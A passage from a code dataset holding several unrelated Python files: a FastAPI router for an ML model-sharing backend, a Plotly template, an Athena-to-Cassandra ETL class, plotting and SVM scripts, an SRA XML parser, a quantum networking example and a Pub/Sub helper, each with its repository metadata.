'count': 0,\n 'has_liked_model': False\n }\n\n model_likes_result = ModelLikeService.get_model_likes(model_name=model_name,\n count_only=True)\n likes_dict['count'] = model_likes_result.data if model_likes_result.is_success() else 0\n likes_dict['has_liked_model'] = False\n\n # Check if user liked model\n # ...\n\n likes = ml_model_schema.Likes(**likes_dict)\n\n # Get comment count\n comment_count = ModelCommentService.get_model_comments(model_name=model_name, count_only=True)\n comment_count = comment_count.data if comment_count.is_success() else 0\n\n # Get GitHub repo's README.md\n raw_readme = None\n if github_repo_readme_url:\n try:\n raw_readme = requests.get(f'https://{github_repo_readme_url}').text\n except:\n raw_readme = None\n\n # Get model's cover photo\n cover_photo = None\n try:\n cover_photo = ModelCoverUploadService.get_model_cover_photo(model_name)\n except:\n cover_photo = None\n\n # Set Result's data property\n result.data = ml_model_schema.MlModelPage(name=model_name,\n version=model_version,\n metrics=metrics,\n parameters=parameters,\n tags=result.data.tags,\n likes=likes,\n comment_count=comment_count,\n signature=signature,\n input_example=input_example,\n api_calls=api_calls,\n creation_time=result.data.creation_timestamp,\n last_update_time=result.data.last_updated_timestamp,\n description=result.data.description,\n user=user,\n hashtags=hashtags,\n github_repo=github_repo,\n github_repo_files_url=github_repo_files_url,\n github_repo_readme_url=github_repo_readme_url,\n model_card=raw_readme,\n cover_photo=cover_photo).dict()\n\n else:\n response.status_code = result.get_status_code()\n\n # Return response\n return result.to_dict()\n\n\n# Update model version\n@router.post('/models/create', status_code=200)\ndef create_model(response: Response,\n model: ml_model_schema.MlModelCreate,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n result = MLflowService.create_registered_model(current_user.data.username, model.name, description=model.description)\n\n invalid_result = Result(\n Result.FAIL,\n '#key# invalid. Please enter a valid JSON object.',\n Result.NOT_ACCEPTABLE\n )\n has_error: bool = False\n\n if result.is_success():\n # Validate model's data\n if model.metrics is not None and not Validation.is_valid_json(model.metrics):\n # Metrics\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Metrics are')\n elif model.parameters is not None and not Validation.is_valid_json(model.parameters):\n # Parameters\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Parameters are')\n elif model.input_example is not None and not Validation.is_valid_json(model.input_example):\n # Input example\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Input example is')\n elif model.signature is not None and not Validation.is_valid_json(model.signature):\n # Signature\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Signature is')\n elif model.github_repo is not None and not Validation.is_github_repo_valid(model.github_repo):\n # GitHub repository\n has_error = True\n invalid_result.message = 'GitHub repository URL is invalid. URL should look something like: github.com/github_username/github_project'\n\n if has_error:\n response.status_code = invalid_result.get_status_code()\n return invalid_result.to_dict()\n \n if model.metrics:\n _ = MLflowService.set_metrics(current_user.data.username, model_name=model.name, metrics=model.metrics)\n if model.parameters:\n _ = MLflowService.set_params(current_user.data.username, model_name=model.name, params=model.parameters)\n if model.github_repo:\n _ = MLflowService.set_github_repo(current_user.data.username, model_name=model.name, url=model.github_repo)\n if model.input_example:\n _ = MLflowService.set_input_example(current_user.data.username, model_name=model.name, input_example=model.input_example)\n if model.signature:\n _ = MLflowService.set_signature(current_user.data.username, model_name=model.name, signature=model.signature)\n else:\n response.status_code = result.get_status_code()\n\n return result.to_dict()\n\n\n@router.post('/models/metrics/{model_name}', status_code=200)\ndef set_model_metrics(model_name: str,\n metrics: ml_model_schema.MlModelMetricsSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model metrics\"\"\"\n result = MLflowService.set_metrics(current_user.data.username, model_name, metrics=metrics.metrics)\n\n return result.to_dict()\n\n\n@router.post('/models/github-repo/{model_name}', status_code=200)\ndef set_github_repo(model_name: str,\n url: ml_model_schema.MlModelGitHubSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model github repo\"\"\"\n result = MLflowService.set_github_repo(current_user.data.username, model_name, url=url.url)\n\n return result.to_dict()\n\n\n@router.post('/models/parameters/{model_name}', status_code=200)\ndef set_model_parameters(model_name: str,\n parameters: ml_model_schema.MlModelParametersSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model parameters\"\"\"\n result = MLflowService.set_params(current_user.data.username, model_name, parameters=parameters.parameters)\n\n return result.to_dict()\n\n@router.post('/models/input_example/{model_name}', status_code=200)\ndef set_model_input_example(model_name: str,\n input_example: ml_model_schema.MlModelInputExampleSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model input example\"\"\"\n result = MLflowService.set_input_example(current_user.data.username, model_name, input_example=input_example.input_example)\n\n return result.to_dict()\n\n@router.post('/models/signature/{model_name}', status_code=200)\ndef set_model_signature(model_name: str,\n signature: ml_model_schema.MlModelSignatureSet,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Set model signature\"\"\"\n result = MLflowService.set_signature(current_user.data.username, model_name, signature=signature.signature)\n\n return result.to_dict()\n\n\n# Update model version\n@router.put('/models/{model_name}', status_code=200)\ndef update_model(model_name: str,\n edit_values: ml_model_schema.MlModelEdit,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Update model\n\n Example cURL:\n curl -X PUT \"http://localhost:8000/api/v0/models/ElasticNet\" -H 'Authorization: Bearer ' \\\n -H \"accept: application/json\" -H \"Content-Type: application/json\" \\\n -d \"{\\\"name\\\":\\\"\\\",\\\"description\\\":\\\"Some description\\\"}\"\n \"\"\"\n\n # Update model\n updated_model_result = MLflowService.update_model_description(model_name=model_name,\n username=current_user.data.username,\n description=edit_values.description)\n\n if updated_model_result.is_fail():\n response.status_code = updated_model_result.get_status_code()\n\n invalid_result = Result(\n Result.FAIL,\n '#key# invalid. Please enter a valid JSON object.',\n Result.NOT_ACCEPTABLE\n )\n has_error: bool = False\n\n # Validate model's data\n if edit_values.metrics is not None and not Validation.is_valid_json(edit_values.metrics):\n # Metrics\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Metrics are')\n elif edit_values.parameters is not None and not Validation.is_valid_json(edit_values.parameters):\n # Parameters\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Parameters are')\n elif edit_values.input_example is not None and not Validation.is_valid_json(edit_values.input_example):\n # Input example\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Input example is')\n elif edit_values.signature is not None and not Validation.is_valid_json(edit_values.signature):\n # Signature\n has_error = True\n invalid_result.message = invalid_result.message.replace('#key#', 'Signature is')\n elif edit_values.github_repo is not None and not Validation.is_github_repo_valid(edit_values.github_repo):\n # GitHub repository\n has_error = True\n invalid_result.message = 'GitHub repository URL is invalid. URL should look something like: github.com/github_username/github_project'\n\n if has_error:\n response.status_code = invalid_result.get_status_code()\n return invalid_result.to_dict()\n\n MLflowService.set_metrics(current_user.data.username, model_name=model_name, metrics=edit_values.metrics) if edit_values.metrics else MLflowService.delete_metrics(current_user.data.username, model_name)\n MLflowService.set_params(current_user.data.username, model_name=model_name, params=edit_values.parameters) if edit_values.parameters else MLflowService.delete_params(current_user.data.username, model_name)\n MLflowService.set_github_repo(current_user.data.username, model_name=model_name, url=edit_values.github_repo) if edit_values.github_repo else MLflowService.delete_github_repo(current_user.data.username, model_name)\n MLflowService.set_input_example(current_user.data.username, model_name=model_name, input_example=edit_values.input_example) if edit_values.input_example else MLflowService.delete_input_example(current_user.data.username, model_name)\n MLflowService.set_signature(current_user.data.username, model_name=model_name, signature=edit_values.signature) if edit_values.signature else MLflowService.delete_signature(current_user.data.username, model_name)\n\n return updated_model_result.to_dict()\n\n\n# Delete model version\n@router.delete('/models/{model_name}', status_code=200)\ndef delete_model_version(model_name: str, model_version: int, response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n \"\"\"Delete model version\n \"\"\"\n result = MLflowService.delete_model_version(username=current_user.data.username,\n model_name=model_name,\n model_version=model_version)\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n\n return result.to_dict()\n\n\n@router.post('/models/{model_name}/hashtags', status_code=200)\ndef add_model_hashtag(model_name: str,\n hashtag: HashtagSchema.HashtagUpdateBase,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n '''\n Create model hashtag\n '''\n\n result = HashtagService.add_model_hashtag(model_name=model_name, value=hashtag.value, key=hashtag.key)\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n\n return result.to_dict()\n\n\n@router.delete('/models/{model_name}/hashtags/{hashtag_id}', status_code=200)\ndef delete_model_hashtag(model_name: str,\n hashtag_id: int,\n response: Response,\n current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n '''\n Deletes model hashtag\n '''\n\n result = HashtagService.delete_model_hashtag(model_name=model_name, hashtag_id=hashtag_id)\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n\n return result.to_dict()\n\n\n@router.post('/predict/{model_name}')\nasync def predict(model_name: str,\n prediction_req: PredictionRequest,\n response: Response,\n current_user=Depends(AuthMiddleware.get_current_user)):\n '''Make prediction using model\n\n Request example: \n curl -X POST \"http://localhost:8000/api/v0/predict/ElasticNet\" \\\n -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJibGMiLCJleHAiOjE2MjY4MTY0MTl9.5LhKKL2gyxrGgF2XHo2QjMcLCQ2ptwRtNOqcPp-qdLk' \\\n -H 'accept: application/json' \\\n -d '{\"columns\": [\"fixed acidity\",\"volatile acidity\",\"citric acid\",\"residual sugar\",\"chlorides\",\"free sulfur dioxide\",\"total sulfur dioxide\",\"density\",\"pH\",\"sulphates\",\"alcohol\"], \"index\": [0, 1], \"data\": [[7,0.27,0.36,20.7,0.045,45,170,1.001,3,0.45,8.8], [7,0.27,0.36,20.7,0.045,45,170,1.001,3,0.45,8.8]]}'\n '''\n prediction_json = json.loads(prediction_req.json())\n batch_size = len(prediction_json['data'])\n\n if batch_size > 10:\n result = Result(\n Result.FAIL,\n 'Failed to perform prediction. Batch size is too big!',\n Result.NOT_ACCEPTABLE\n )\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n # Get model\n registered_model_result = MLflowService.get_model(model_name=model_name)\n if registered_model_result.is_fail() or len(registered_model_result.data.latest_versions) == 0:\n return Result(Result.SUCCESS,\n f\"Failed to get deployment endpoint for model with name '{model_name}'. {registered_model_result}\",\n Result.NOT_FOUND)\n model_version = registered_model_result.data.latest_versions[0].version\n\n # Predict\n # NOTE this is horrible; reuse token (don't know how...)\n access_token, _ = AuthMiddleware.create_access_token(data={'sub': current_user.data.username},\n expires_delta=int(os.getenv('ACCESS_TOKEN_EXPIRATION')))\n try:\n async with aiohttp_session.post(\n f'http://{PREDICTION_SERVER}:{PREDICTION_SERVER_PORT}/api/v0/serving/predict/{model_name}/{model_version}',\n headers={'Authorization': f'Bearer {access_token}'},\n json=prediction_json) as resp:\n predict_result = await resp.text()\n print(f'[DEBUG] predict_result: {predict_result}')\n\n result = json.loads(predict_result)\n\n # Log api call\n if result['status'] == Result.SUCCESS:\n api_call_create = ApiCallSchema.ApiCallCreate(user_id=current_user.data.id, model_name=model_name,\n model_version=model_version)\n api_calls = ApiCallService.create_batch(api_call_create, batch_size)\n\n if api_calls.is_fail():\n response.status_code = api_calls.get_status_code()\n return api_calls.to_dict()\n\n return result\n else:\n result_fail = Result(\n Result.FAIL,\n f'Could not perform prediction using model ({model_name}, {model_version}). An unexpected error occured.',\n Result.EXCEPTION\n )\n response.status_code = result_fail.get_status_code()\n return result_fail.to_dict()\n\n except Exception as e:\n print(f'[EXCEPTION] Could not perform prediction using model ({model_name}, {model_version}). Exception: {e}')\n result_fail = Result(Result.FAIL,\n f'Could not perform prediction using model ({model_name}, {model_version}). An unexpected error occured.',\n Result.EXCEPTION)\n response.status_code = result_fail.get_status_code()\n\n return result_fail.to_dict()\n\n\n# Get model version usage\n@router.get('/models/{model_name}/usage')\nasync def get_model_usage(model_name: str, response: Response, sample: str = 'D'):\n ''' Get total and sampled API calls for model version - sample is a query param\n \n :param model_name: the name of the model\n :param model_version: the version of the model\n :param sample: the the sample to which to sample count\n\n :return: a json object with total and sampled api calls \n Example:\n Get usage by 1 minute interval\n curl http:/localhost:8000/api/v0/model_usage/ElasticNet/1/?sample=1Min\n '''\n sampled_count = ApiCallService.count_by(model_name, sample=sample)\n\n if sampled_count.is_fail():\n response.status_code = sampled_count.get_status_code()\n return sampled_count.to_dict()\n\n total_count = 0\n sampled_count_json = json.loads(sampled_count.data['sampled_count'])\n for k in sampled_count_json:\n total_count += sampled_count_json[k]\n\n results = {'count': total_count,\n 'sampled_count': sampled_count.data['sampled_count'],\n 'distinct_users_count': sampled_count.data['distinct_users_count']}\n\n return Result(\n Result.SUCCESS,\n 'Successfully fetched model usage',\n results\n ).to_dict()\n\n\n# Get model versions\n@router.get('/versions/{model_name}', status_code=200)\ndef get_model_versions(model_name: str, response: Response):\n result = MLflowService.list_model_versions(model_name=model_name)\n model_versions = []\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n for model_version in result.data:\n model_versions.append(Format.format_model_version(model_version))\n\n result.data = model_versions\n\n return result.to_dict()\n\n# Upload cover photo\n@router.post('/models/{model_name}/cover', status_code=200)\ndef upload_cover_photo(model_name: str, response: Response, cover_photo: UploadFile = File(...)):\n # Get cover photo's path\n full_cover_photo_path = ModelCoverUploadService.get_model_cover_photo_path(model_name)\n\n # Check if file extension is valid\n if not ImageUploadService.is_valid_extension(content_type=cover_photo.content_type):\n result = Result(\n Result.FAIL,\n 'Invalid file extension',\n Result.NOT_ACCEPTABLE\n )\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n # Check if model exists\n model = MLflowService.get_model(model_name=model_name)\n\n if model.is_fail():\n response.status_code = model.get_status_code()\n return model.to_dict()\n\n # Save cover photo\n try:\n utilities.clear_dir(full_cover_photo_path)\n utilities.create_dir(full_cover_photo_path)\n utilities.save_uploaded_file(full_cover_photo_path, cover_photo)\n except Exception:\n result = Result(\n Result.FAIL,\n 'An error occurred while saving cover photo',\n Result.EXCEPTION\n )\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n return Result(\n Result.SUCCESS,\n 'Successfully saved cover photo'\n ).to_dict()\n","repo_name":"shippedbrain/shipped-brain-backend","sub_path":"api/src/routers/ml_models.py","file_name":"ml_models.py","file_ext":"py","file_size_in_byte":32093,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"33471336830","text":"class CovidFormat:\n\n # Template for plot visuals\n covid_template = dict(\n font=dict(\n #family=\"Courier New, monospace\",\n size=15,\n color=\"Black\"\n ),\n height=600,\n width=900,\n\n )\n\n # Template for handling slider functionality for plots and providing buttons to alter time-period range of data\n slider_template = dict(\n rangeselector=dict(\n buttons=list([\n dict(count=7.5,\n label=\"Weekly\",\n step=\"day\",\n stepmode=\"todate\"),\n dict(count=14,\n label=\"Biweekly\",\n step=\"day\",\n stepmode=\"backward\"),\n dict(count=1,\n label=\"Monthly\",\n step=\"month\",\n stepmode=\"backward\"),\n dict(count=1,\n label=\"Yearly\",\n step=\"year\",\n stepmode=\"todate\"),\n dict(label=\"All\",step=\"all\")\n ])\n ),\n rangeslider=dict(\n visible=True\n ),\n type=\"date\"\n )\n\n","repo_name":"MatthewBailey97/Georgia_Covid","sub_path":"formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34459989844","text":"\"\"\"\nhandle ETL of data from Athena to Cassandra\n\"\"\"\nfrom typing import Optional, List\nfrom dataclasses import dataclass\n\nfrom hip_data_tools.apache.cassandra import CassandraConnectionSettings\nfrom hip_data_tools.aws.athena import AthenaUtil\nfrom hip_data_tools.aws.common import AwsConnectionSettings, AwsConnectionManager\nfrom hip_data_tools.etl.s3_to_cassandra import S3ToCassandraSettings, S3ToCassandra\n\n\n@dataclass\nclass AthenaToCassandraSettings:\n \"\"\"S3 to Cassandra ETL settings\"\"\"\n source_database: str\n source_table: str\n source_connection_settings: AwsConnectionSettings\n destination_keyspace: str\n destination_table: str\n destination_table_primary_keys: List[str]\n destination_table_partition_key: Optional[List[str]]\n destination_connection_settings: CassandraConnectionSettings\n destination_table_options_statement: str = \"\"\n destination_batch_size: int = 1\n\n\nclass AthenaToCassandra(S3ToCassandra):\n \"\"\"\n Class to transfer parquet data from s3 to Cassandra\n Args:\n settings (AthenaToCassandraSettings): the settings around the etl to be executed\n \"\"\"\n\n def __init__(self, settings: AthenaToCassandraSettings):\n self.__settings = settings\n self._athena = AthenaUtil(\n database=self.__settings.source_database,\n conn=AwsConnectionManager(self.__settings.source_connection_settings))\n (bucket, key) = self._athena.get_table_data_location(self.__settings.source_table)\n super().__init__(S3ToCassandraSettings(\n source_bucket=bucket,\n source_key_prefix=key,\n source_connection_settings=self.__settings.source_connection_settings,\n destination_keyspace=self.__settings.destination_keyspace,\n destination_table=self.__settings.destination_table,\n destination_table_primary_keys=self.__settings.destination_table_primary_keys,\n destination_table_partition_key=self.__settings.destination_table_partition_key,\n destination_table_options_statement=self.__settings.destination_table_options_statement,\n destination_batch_size=self.__settings.destination_batch_size,\n destination_connection_settings=self.__settings.destination_connection_settings,\n ))\n","repo_name":"hipagesgroup/data-tools","sub_path":"hip_data_tools/etl/athena_to_cassandra.py","file_name":"athena_to_cassandra.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"27928056617","text":"import os, re, sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.style.use(\"ggplot\")\nplt.rcParams[\"font.size\"] = 12\nplt.rcParams['text.latex.preamble']=[r\"\\usepackage{amsmath}\"]\n\ndatasets = [\"amazon-photo\", \"pubmed\", \"amazon-computers\", \"coauthor-physics\", \"flickr\"]\n# datasets = [\"amazon-computers\"]\nmodes = [\"cluster\", \"graphsage\"]\nalgs = [\"gcn\", \"ggnn\", \"gat\", \"gaan\"]\n# algs = [\"gat\"]\n\ncluster_batchs = [15, 45, 90, 150, 375, 750]\n\ngraphsage_batchs = {\n 'amazon-photo': [77, 230, 459, 765, 1913, 3825],\n 'pubmed': [198, 592, 1184, 1972, 4930, 9859],\n 'amazon-computers': [138, 413, 826, 1376, 3438, 6876],\n 'coauthor-physics': [345, 1035, 2070, 3450, 8624, 17247],\n 'flickr': [893, 2678, 5355, 8925, 22313, 44625]\n}\n\nxticklabels = ['1%', '3%', '6%', '10%', '25%', '50%', 'FULL']\n\ndir_in = \"log_fix_epoch\"\ndir_out = \"res_fix_epoch\"\n\nfor data in datasets:\n if not os.path.exists(dir_out + \"/\" + data):\n os.makedirs(dir_out + \"/\" + data)\n \n\"\"\"\n目标:绘制不同BatchSize下,精度随Batch Nums的变化结果\n\n数据收集:\n算法, 采样方法,数据集,time/acc\n\n绘制图像:\n算法+采样方法+time/acc\ndf.index: 图像的横坐标\ndf.columns: 图像中的不同的线(不同的BatchSize)\n\"\"\"\nfor data in datasets:\n for alg in algs:\n for mode in modes:\n print(data, alg, mode)\n flag = False\n # 将数据存储到csv文件\n df_times, df_accs = {}, {}\n if mode == \"cluster\":\n for i, cs in enumerate(cluster_batchs):\n file_path = os.path.join(dir_in, '_'.join([mode, alg, data, str(cs)]) + \".log\")\n if not os.path.exists(file_path):\n flag = True\n break\n df_times[xticklabels[i]], df_accs[xticklabels[i]] = [], []\n # 读取日志文件,获取bs_times, bs_accs: dims=100\n with open(file_path) as f:\n for line in f:\n match_line = re.match(r\"Batch:.*best_test_acc: (.*), cur_use_time: (.*)s\", line)\n if match_line:\n df_accs[xticklabels[i]].append(float(match_line.group(1)))\n df_times[xticklabels[i]].append(float(match_line.group(2)))\n if len(df_times[xticklabels[i]]) != 100:\n flag = True\n break \n elif mode == \"graphsage\":\n for i, gs in enumerate(graphsage_batchs[data]):\n file_path = os.path.join(dir_in, '_'.join([mode, alg, data, str(gs)]) + \".log\")\n df_times[xticklabels[i]], df_accs[xticklabels[i]] = [], []\n # 读取日志文件,获取bs_times, bs_accs: dims=100\n if not os.path.exists(file_path):\n flag = True\n break\n with open(file_path) as f:\n for line in f:\n match_line = re.match(r\"Batch:.*best_test_acc: (.*), cur_use_time: (.*)s\", line)\n if match_line:\n df_accs[xticklabels[i]].append(float(match_line.group(1)))\n df_times[xticklabels[i]].append(float(match_line.group(2)))\n if len(df_times[xticklabels[i]]) != 100:\n flag = True\n break\n\n if flag: continue\n\n # 获取full\n file_path = os.path.join(\"batch_acc_cum_fix_batch\", '_'.join([mode, alg, data]) + \"_full.log\")\n # 读取日志文件,获取bs_times, bs_accs: dims=100\n with open(file_path) as f:\n df_times['FULL'], df_accs['FULL'] = [], []\n for line in f:\n match_line = re.match(r\"Batch:.*best_test_acc: (.*), cur_use_time: (.*)s\", line)\n if match_line:\n df_accs['FULL'].append(float(match_line.group(1)))\n df_times['FULL'].append(float(match_line.group(2)))\n\n # 画精度关于时间的图像\n fig, ax = plt.subplots()\n ax.set_ylabel('Accucary')\n ax.set_xlabel(\"use time(s)\")\n \n category_colors = plt.get_cmap('RdYlGn')(\n np.linspace(0.15, 0.85, len(xticklabels))) \n \n for key, c in zip(xticklabels, category_colors):\n ax.plot(df_times[key], df_accs[key], color=c, label=key)\n \n ax.legend()\n fig.tight_layout() # 防止重叠\n fig.savefig(dir_out + \"/\" + data + \"/\" + alg + \"_\" + mode + \"_accs_times.png\")\n plt.close() \n \n\n ","repo_name":"AugF/pyg-gnns","sub_path":"paper_exp6_sampling_acc/handle_sampling_acc_fix_epoch.py","file_name":"handle_sampling_acc_fix_epoch.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"5202810093","text":"import streamlit as st\r\nimport pickle\r\nimport numpy as np\r\nfrom PIL import Image\r\nimage = Image.open('FuelPredx_logo.jpg')\r\n\r\ndef load_model():\r\n with open('saved_steps.pkl', 'rb') as file:\r\n data = pickle.load(file)\r\n return data\r\n\r\n\r\ndata = load_model()\r\n\r\nregressor = data[\"model\"]\r\n\r\n\r\ndef show_predict_page():\r\n st.title(\"FuelPredx : Software for Tractor Fuel Consumption Prediction\")\r\n st.sidebar.image(image, use_column_width=True)\r\n st.write(\"\"\"### We need some information to predict the Fuel Consumption\"\"\")\r\n\r\n Tractor_PTO = st.number_input('Enter PTO Power (kW)')\r\n Engine_Speed = st.number_input('Enter Engine Speed (RPM)')\r\n Speed_Depression = st.number_input('Enter Speed Depression (RPM)')\r\n\r\n ok = st.button(\"Calculate Fuel Consumption\")\r\n if ok:\r\n X = np.array([[Tractor_PTO, Engine_Speed, Speed_Depression]])\r\n X = X.astype(float)\r\n\r\n salary = regressor.predict(X)\r\n st.subheader(f\"The estimated Fuel Consumption(L/h) is {salary[0]:.2f}\")\r\n\r\n\r\n\r\n","repo_name":"Ambuj-coder1997/FUEL-CONSUMPTION_XGBOOST","sub_path":"predict_page.py","file_name":"predict_page.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34777199940","text":"with open('../Dane_2203/liczby.txt') as f:\n liczby = [[int(j) for j in i.split()] for i in f.readlines()]\n\n\ndef prime(n):\n if n < 2: return False\n if n < 4: return True\n for i in range(2, n // 2 + 1):\n if n % i == 0:\n return False\n return True\n\ndef nwd(a, b):\n while a != b:\n if a > b:\n a -= b\n else:\n b -= a\n return a\n\n\ndef potega(a, x, M = None):\n if x == 0:\n \treturn 1\n if x % 2 == 0:\n \ttmp = potega(a, x // 2, M)\n \treturn (tmp * tmp) % M\n if x % 2 == 1:\n \ttmp = potega(a, (x - 1) // 2, M)\n \treturn (a * tmp * tmp) % M\n\n\ncount = 0\nfor l in liczby:\n M = l[0]\n if prime(M):\n count += 1\n\nprint(count)\n\n\ncount = 0\nfor l in liczby:\n M = l[0]\n a = l[1]\n if nwd(M, a) == 1:\n count += 1\n\nprint(count)\n\n\ncount = 0\nfor l in liczby:\n M, a, b = l\n\n for x in range(0, M):\n if potega(a, x, M) == b:\n count += 1\n break\n\nprint(count)\n","repo_name":"loudsheep/matura","sub_path":"informatyka/przykładowy_2023/zad3/rozw.py","file_name":"rozw.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27322330391","text":"import sys\nimport json\nfrom cqc.pythonLib import CQCConnection\n\n\ndef main(nr_runs):\n meas_outcomes = {}\n\n # Initialize the connection\n with CQCConnection(\"Bob\") as Bob:\n\n for _ in range(nr_runs):\n\n # Create an EPR pair\n q = Bob.recvEPR()\n\n # Get the identifier of this EPR pair such that Alice can relate the measuement outcomes to hers\n sequence_nr = q.get_entInfo().id_AB\n\n if (sequence_nr % 3) == 0:\n # Measure in Z\n pass\n elif (sequence_nr % 3) == 1:\n # Measure in X\n q.H()\n else:\n # Measure in Y\n q.K()\n\n m = q.measure()\n meas_outcomes[sequence_nr] = m\n\n # Encode the measurement outcomes to bytes, such that we can send them\n msg = json.dumps(meas_outcomes).encode(\"utf-8\")\n\n # Send the measurement outcomes to Alice\n Bob.sendClassical(name=\"Alice\", msg=msg)\n\n\nif __name__ == \"__main__\":\n try:\n nr_runs = int(sys.argv[1])\n except Exception:\n nr_runs = 500\n if nr_runs > 1000:\n raise ValueError(\"Number of EPR pairs for this example is currently restricted to less than 1000\")\n main(nr_runs)\n","repo_name":"SoftwareQuTech/CQC-Python","sub_path":"examples/pythonLib/QBER/bobTest.py","file_name":"bobTest.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"18332759273","text":"from app.config import project_id\nimport json\n\n\ndef publish_topic(topic, message):\n from google.cloud import pubsub_v1\n\n publisher = pubsub_v1.PublisherClient()\n topic_path = publisher.topic_path(project_id, topic)\n message_data = json.dumps(message).encode('utf-8')\n future = publisher.publish(topic_path, data=message_data)\n future.result()\n print(f'Published Pub/Sub topic {topic} with message: {json.dumps(message)}')\n","repo_name":"Heonozis/gcp-serverless-python","sub_path":"app/common/lib/publish_topic.py","file_name":"publish_topic.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42839210816","text":"import json\n\nimport xmltodict\n\nsra_file = open('input/gisaid-sra.xml')\n\nlines_to_keep = []\nsets_kept = 0\ntag_counter = 0\ntag = 'EXPERIMENT_PACKAGE'\nin_tag = False\nprocess_chunk = False\nfor line in sra_file:\n if '<%s>' % tag in line:\n in_tag = True\n tag_counter += 1\n if in_tag:\n lines_to_keep.append(line)\n if '' % tag in line:\n in_tag = False\n tag_counter -= 1\n if tag_counter == 0:\n process_chunk = True\n if process_chunk:\n process_chunk = False\n xml = ''.join(lines_to_keep)\n xml_filename = 'output/sra-parsing/set-%d.xml' % sets_kept\n with open(xml_filename, 'w') as xml_file:\n xml_file.write(xml)\n json_filename = 'output/sra-parsing/set-%d.json' % sets_kept\n with open(json_filename, 'w') as json_file:\n as_dict = xmltodict.parse(xml)\n json_file.write(json.dumps(as_dict))\n sets_kept += 1\n print('Wrote %d lines to %s...' % (len(lines_to_keep), json_filename))\n tag_counter = 0\n lines_to_keep = []\nsra_file.close()\n","repo_name":"veg/biosampleMeta","sub_path":"scripts/gisaid-sra-scrape.py","file_name":"gisaid-sra-scrape.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16257704126","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 16 23:00:50 2022\n\n@author: aiatul\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import svm\nfrom sklearn.svm import SVC\n\ndataset = pd.read_csv(\"diabetes.csv\")\n\nX = dataset.drop(columns = 'Outcome', axis=1)\nY = dataset['Outcome']\nscaler = StandardScaler()\nscaler.fit(X)\nstandardized_data = scaler.transform(X)\nx = standardized_data\ny = dataset['Outcome']\n\nx_train, x_test, y_train, y_test = train_test_split(x,y, test_size = 0.2, stratify=y, random_state=2)\n\nclassifier = svm.SVC(kernel='linear')\nclassifier.fit(x_train,y_train)\nSVC(kernel='linear')\nx_train_prediction = classifier.predict(x_train)\ntraining_data_accuracy = accuracy_score(x_train_prediction, y_train)\nprint('Accuracy score of the training data : ', training_data_accuracy)\n\n\n# accuracy score on the test data\nx_test_prediction = classifier.predict(x_test)\ntest_data_accuracy = accuracy_score(x_test_prediction, y_test)\n\nprint('Accuracy score of the test data : ', test_data_accuracy)\n\ninput_data = (5,166,72,19,175,25.8,0.587,51)\n\n# changing the input_data to numpy array\ninput_data_as_numpy_array = np.asarray(input_data)\n\n# reshape the array as we are predicting for one instance\ninput_data_reshaped = input_data_as_numpy_array.reshape(1,-1)\n\n# standardize the input data\nstd_data = scaler.transform(input_data_reshaped)\nprint(std_data)\n\nprediction = 